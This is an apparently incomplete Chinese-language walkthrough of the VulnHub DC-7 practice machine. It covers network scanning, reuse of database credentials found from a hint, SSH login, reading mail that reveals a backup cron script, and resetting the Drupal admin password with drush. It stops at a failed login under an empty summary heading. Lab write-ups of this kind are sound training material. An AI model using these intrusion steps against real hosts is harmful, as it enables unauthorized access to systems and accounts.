靶场地址
https://download.vulnhub.com/dc/DC-7.zip
目标
获取所有的flag
漏洞复现
sudo arp-scan -l
# 探测主机存活
nmap -p- 192.168.5.131 --min-rate=5000
http://192.168.5.131:80
# 访问80页面,寻找有用信息。根据提示不要暴力破解,寻找框以外的内容“@DC7USER”
<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
尝试登陆网页失败
靶场开放了22端口,尝试SSH连接
ssh dc7user@192.168.5.131
MdR3xOgB7#dW
ls
# 提示有一封新的邮件
cd /var/mail
cat dc7user
# 在一封邮件里面,发现了一条计划任务
cd /opt/scripts
cat backups.sh
# 查看backups.sh文件,发现能运行drush命令,drush命令可以更改密码,在/var/www/html目录下运行drush命令,更改admin的密码。
cd /var/www/html
drush user-password admin --password "123456"
使用 admin / 123456 登录一直不成功
总结